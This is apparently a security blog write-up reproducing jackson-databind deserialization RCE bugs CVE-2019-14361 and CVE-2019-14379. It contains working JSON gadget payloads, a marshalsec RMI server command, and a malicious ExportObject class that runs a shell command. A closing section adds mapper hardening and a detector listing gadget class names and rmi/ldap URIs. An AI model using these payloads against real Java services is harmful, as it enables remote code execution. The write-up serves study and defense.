
Title: CVE-2019-14361 and CVE-2019-14379 vulnerability reproduction


CVE-2019-14361 / CVE-2019-14379 vulnerability reproduction

On the evening of July 30 I received a push notification: jackson-databind had a new RCE, and some well-known researchers had found a new way to exploit it.

Vulnerability analysis

According to the issue filed by the Jackson developers, triggering this vulnerability requires the following conditions:

The target application receives JSON data sent by an untrusted client

The target application uses polymorphic type processing method to handle properties of the java.lang.Object type;

This vulnerability depends on quite a few third-party jar packages being on the classpath (personally, I find it quite a coincidence that one would encounter exactly these libraries during real-world exploitation).

Environment setup

The third-party libraries used in this article are:

jackson-annotations-2.9.8

jackson-core-2.9.8

jackson-databind-2.9.8

ehcache-2.9.1

slf4j-api-1.7.7

logback-core-1.3.0-alpha4

slf4j-simple-1.7.21

javax.transaction_1.0.0.0_1-1

All of them can be downloaded from http://www.mvnrepository.com.

Vulnerable code (PoC)

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;

public class Main {

    public static void main(String[] args) {

        System.out.println("Mapping");

        // Note that newer JDKs restrict remote codebase loading: com.sun.jndi.rmi.object.trustURLCodebase
        // must be set to true for the RMI reference to resolve; the default is false.
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

        // CVE-2019-14361 payload (logback-core gadget)
        String jsonStr1 = "[\"ch.qos.logback.core.db.JNDIConnectionSource\", {\"jndiLocation\":\"rmi://127.0.0.1:1099/ExportObject\"}]";

        // CVE-2019-14379 payload (ehcache gadget)
        String jsonStr2 = "[\"net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup\",{\"properties\":{\"jndiName\":\"rmi://127.0.0.1:1099/ExportObject\"}}]";

        ObjectMapper mapper = new ObjectMapper();
        // Default typing is the precondition: the [type id, properties] array form above is honoured for java.lang.Object
        mapper.enableDefaultTyping();
        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);

        System.out.println("Serializing");

        Object obj = null;

        try {
            // !- Replace payload here -!
            obj = mapper.readValue(jsonStr1, java.lang.Object.class);
        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.println("objectified");

        try {
            mapper.writeValueAsString(obj);
        } catch (Exception e) {
            e.printStackTrace();
        }

        try {
            System.out.println("stringified: " + mapper.writeValueAsString(obj));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

Build steps

This article builds the project in IntelliJ IDEA:

Create a new Java command-line project.

Copy the code above into the Main class.

Click the icon highlighted in the red box to open the project structure settings.

[screenshot omitted]

Import the downloaded external libraries into the project.

For detailed import steps see my earlier article, https://www.secquan.org/BugWarning/1069944; I won't repeat them here.

Attack flow

Turn on RMI service

For convenience we can use the marshalsec tool, which can quickly bring up RMI and LDAP services. You need to download the source package and build it with Maven. Download link: https://github.com/mbechler/marshalsec. After cloning it locally, build it with mvn clean package -DskipTests. The build result looks like this:

[screenshot omitted]

Start the RMI service:

```shell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip:8000/#ExportObject
```

[screenshot omitted]

Note: after the # fill in the class name of your malicious class; marshalsec binds that URI automatically, and the default RMI port is 1099.

Compile ExportObject.java

The ExportObject.java code content is as follows:

```java
package com.by.rmi;

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class ExportObject {

    // The constructor runs when the class is instantiated by the JNDI reference resolution
    public ExportObject() throws Exception {

        Process proc = Runtime.getRuntime().exec("open /Applications/Calculator.app");

        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();
        String line;

        while ((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }

        // Surface the command output by throwing it back as an exception message
        String result = sb.toString();
        Exception e = new Exception(result);
        throw e;
    }

    public static void main(String[] args) throws Exception {
        ExportObject e = new ExportObject();
    }
}
```

Note: the code above pops up the Calculator on macOS; on another platform, replace the command passed to exec accordingly.

Compile it into a class file:

```shell
javac ExportObject.java
```

In the folder containing the generated ExportObject.class, run python2 -m SimpleHTTPServer 8000 to serve it over HTTP locally.

CVE-2019-14361 test

Set the payload in the PoC to jsonStr1, compile and run; the result is as follows:

[screenshot omitted]

CVE-2019-14379 test

Set the payload in the PoC to jsonStr2, compile and run; the result is as follows:

[screenshot omitted]

Correspondingly, the RMI service side looks like this while it runs:

[screenshot omitted]
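The defensive counterpart of the PoC above, as an added example that is not part of the original post and not from the Jackson, logback or ehcache projects. It shows the two conditions from the vulnerability analysis being closed: the `ObjectMapper` only accepts type ids under an allow-listed package prefix instead of any class on the classpath (this needs jackson-databind 2.10+, where `BasicPolymorphicTypeValidator` and `activateDefaultTyping` replaced the blanket `enableDefaultTyping()`; the `com.example.model.` prefix is a hypothetical application package), a startup check confirms the JDK `trustURLCodebase` switches the PoC flips are still off, and a pre-parse detector flags the two gadget class names and `rmi://`/`ldap://` URIs named in the post so that attempts can be logged. The sample inputs are the post's two payloads plus one constructed benign document.

```java
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.ObjectMapper.DefaultTyping;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

import java.util.Arrays;
import java.util.List;

/**
 * Added example (not from the original post). Requires jackson-databind 2.10+ for
 * PolymorphicTypeValidator; the PoC in the post targets 2.9.8, which lacks it.
 */
public class JacksonHardening {

    // Hypothetical package holding the application's own polymorphic types.
    static final String APP_TYPE_PREFIX = "com.example.model.";

    // Gadget classes named in the post; extend as new gadgets are published.
    static final List<String> KNOWN_GADGETS = Arrays.asList(
            "ch.qos.logback.core.db.JNDIConnectionSource",                          // CVE-2019-14361
            "net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup");  // CVE-2019-14379

    /** Default typing restricted to an allow-list: any other type id is rejected before class loading. */
    static ObjectMapper buildHardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(APP_TYPE_PREFIX)
                .build();
        ObjectMapper mapper = new ObjectMapper();
        // Replaces mapper.enableDefaultTyping(), which accepted any class on the classpath.
        mapper.activateDefaultTyping(ptv, DefaultTyping.NON_FINAL);
        return mapper;
    }

    /** The PoC sets the RMI property to true; a hardened JVM keeps both at their default of false. */
    static boolean checkJndiHardening() {
        return !Boolean.getBoolean("com.sun.jndi.rmi.object.trustURLCodebase")
                && !Boolean.getBoolean("com.sun.jndi.ldap.object.trustURLCodebase");
    }

    /** Detection only: a known gadget in Jackson's [type id, properties] form, or a JNDI URI anywhere. */
    static boolean looksLikeJndiGadget(ObjectMapper plainMapper, String json) throws JsonProcessingException {
        JsonNode root = plainMapper.readTree(json);
        if (root.isArray() && root.size() > 0 && root.get(0).isTextual()
                && KNOWN_GADGETS.contains(root.get(0).asText())) {
            return true;
        }
        return containsJndiUri(root);
    }

    private static boolean containsJndiUri(JsonNode node) {
        if (node.isTextual()) {
            String v = node.asText().toLowerCase();
            return v.startsWith("rmi://") || v.startsWith("ldap://") || v.startsWith("ldaps://");
        }
        // JsonNode is Iterable over its child values for both arrays and objects
        for (JsonNode child : node) {
            if (containsJndiUri(child)) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper plain = new ObjectMapper();   // no default typing at all: the simplest fix

        // Constructed inputs: the two payload shapes from the post and one benign document.
        String[] samples = {
            "[\"ch.qos.logback.core.db.JNDIConnectionSource\", {\"jndiLocation\":\"rmi://127.0.0.1:1099/ExportObject\"}]",
            "[\"net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup\",{\"properties\":{\"jndiName\":\"rmi://127.0.0.1:1099/ExportObject\"}}]",
            "{\"user\":\"alice\",\"roles\":[\"reader\"]}"
        };
        for (String s : samples) {
            System.out.println((looksLikeJndiGadget(plain, s) ? "SUSPICIOUS " : "ok         ") + s);
        }
        System.out.println("JNDI codebase trust disabled: " + checkJndiHardening());

        // The hardened mapper refuses the gadget type id instead of instantiating it.
        try {
            buildHardenedMapper().readValue(samples[0], Object.class);
        } catch (JsonProcessingException e) {
            System.out.println("hardened mapper rejected payload: " + e.getOriginalMessage());
        }
    }
}
```

The detector is a denylist and will miss the next gadget; its value is telemetry. The fix that actually closes the class of bugs is the mapper configuration: either never enable default typing for `java.lang.Object` properties, or, where polymorphic input is unavoidable, constrain it to your own types with a `PolymorphicTypeValidator` and upgrade off the 2.9.x line used in the post.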
